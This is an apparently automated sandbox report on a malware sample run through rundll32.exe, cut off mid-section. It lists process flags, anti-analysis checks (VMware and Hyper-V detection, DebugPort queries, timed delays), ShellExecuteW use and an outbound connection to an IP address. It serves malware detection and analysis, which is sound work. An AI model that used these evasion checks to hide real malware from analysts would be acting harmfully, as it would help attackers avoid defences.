Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\SysWOW64\rundll32.exe

Check user administrative privileges: IsUserAndAdmin, DecisionNode

graph_12-12456

Source: C:\Windows\SysWOW64\rundll32.exe	API coverage: 6.5 %
Source: C:\Windows\SysWOW64\rundll32.exe	API coverage: 9.0 %
Source: C:\Windows\SysWOW64\rundll32.exe	API coverage: 6.5 %
Source: C:\Windows\SysWOW64\rundll32.exe	API coverage: 6.5 %

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04A4E5A4 FindFirstFileW,FindClose,	4_2_04A4E5A4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04A4DFD8 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,	4_2_04A4DFD8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_043CE5A4 FindFirstFileW,FindClose,	12_2_043CE5A4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_043CDFD8 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,	12_2_043CDFD8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_03FFE5A4 FindFirstFileW,FindClose,	13_2_03FFE5A4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_03FFDFD8 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,	13_2_03FFDFD8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0494E5A4 FindFirstFileW,FindClose,	14_2_0494E5A4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0494DFD8 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,	14_2_0494DFD8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D4E5A4 FindFirstFileW,FindClose,	15_2_04D4E5A4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D4DFD8 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,	15_2_04D4DFD8

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_04A502F4 GetSystemInfo,

4_2_04A502F4

Source: C:\Windows\System32\loaddll32.exe

Thread delayed: delay time: 120000

System process connects to network (likely due to code injection or exploit)

Source: Amcache.hve.8.dr	Binary or memory string: VMware
Source: Amcache.hve.8.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.8.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.8.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.8.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.8.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.8.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.8.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: rundll32.exe, 0000000C.00000002.2473936771.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2118014751.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW3
Source: rundll32.exe, 0000000C.00000002.2473936771.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2118014751.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.8.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.8.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.8.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.8.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.8.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.8.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.8.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.8.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.8.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.8.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.8.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.8.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.8.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.8.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.8.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.8.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.8.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.8.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.8.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.8.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: rundll32.exe, 0000000C.00000003.2118014751.0000000002A32000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.2473936771.0000000002A32000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWHK
Source: Amcache.hve.8.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Windows\SysWOW64\rundll32.exe	API call chain: ExitProcess graph end node	graph_4-9224
Source: C:\Windows\SysWOW64\rundll32.exe	API call chain: ExitProcess graph end node	graph_13-12559
Source: C:\Windows\SysWOW64\rundll32.exe	API call chain: ExitProcess graph end node	graph_14-9225
Source: C:\Windows\SysWOW64\rundll32.exe	API call chain: ExitProcess graph end node	graph_15-9217

Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\rundll32.exe

Network Connect: 3.5.234.32 443

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 12_2_046021C4 ShellExecuteW,

12_2_046021C4

Source: C:\Windows\SysWOW64\cmd.exe

